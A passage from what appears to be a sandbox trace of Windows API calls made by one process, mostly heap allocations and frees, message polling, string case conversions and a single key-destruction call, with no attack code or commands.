0x34aa7f0 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0252.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.290] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0252.290] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0252.290] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0252.291] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.291] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.291] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.291] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.291] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.291] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.292] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.292] CryptDestroyKey (hKey=0xaa5920) returned 1 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.294] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0252.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.296] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0252.296] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.296] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.297] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.297] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.297] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0252.297] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.297] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.298] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.298] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.298] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0252.301] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.301] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.301] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.301] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.301] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.302] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.302] HeapFree (in: 